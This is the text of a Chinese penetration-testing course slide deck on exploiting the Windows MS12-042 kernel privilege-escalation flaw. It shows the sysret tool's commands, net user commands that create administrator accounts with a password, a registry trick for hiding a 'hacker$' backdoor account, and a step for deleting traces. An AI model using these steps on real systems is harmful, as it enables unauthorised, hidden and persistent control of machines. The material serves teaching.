网络渗透与防护 课中学习 Win漏洞-12042-ppt(PPT).pptxVIP

技能点：MS12-042漏洞利用By王隆杰MS12-042漏洞简介存在于 Windows XP 和 Windows Server 2003 的所有 32 位版本、Windows 7（用于基于 x64 的系统）以及 Windows Server 2008 R2（用于基于 x64 的系统）该漏洞是Windows 内核中的漏洞，可能允许特权提升参见微软官网/library/security/ms12-042MS12-042漏洞简介Windows用户模式调度程序（ Windows User Mode Scheduler ）存在内存破坏漏洞用户模式调度程序处理系统请求时存在权限提升可能，成功利用后可导致在内核模式中运行任意代码。MS12-042漏洞利用实验步骤01普通用户登录Windows Server 2008 R2系统02使用漏洞利用工具sysret提权03添加管理员用户temp04添加新的用户hacker$，并隐藏该用户使用漏洞利用工具sysret提权Usage : sysret.exe option argumentoption :-pid pid-exec executable提权有两种途径：使用tasklist命令找出cmd或者powershell进程号，使用 sysret –pid XXXX命令把进程提权。因可能导致蓝屏，不建议采用。使用sysret –e cmd.exe命令进行提权提权后添加管理员用户whoami确认是否提权成功net user temp Qaz123!@# /addnet localgroup administrators temp /add以上添加temp用户，并把用户加到管理员组添加隐藏管理员用户用新添加的temp用户登录windowsnet user hacker$ Qaz123!@# /add以上添加hacker$用户，并把用户加到管理员组，使用net user命令看不到该用户，但在“计算机管理”界面中能看到隐藏新添加的管理员用户使用regedt32导出hacker$的注册表项在“计算机管理”界面中删除hacker$用户使用regedt32导回hacker$的注册表项则hacker$用户被隐藏了打扫战场改注册表：使用hacker$用户登录在“计算机管理”界面中删除temp用户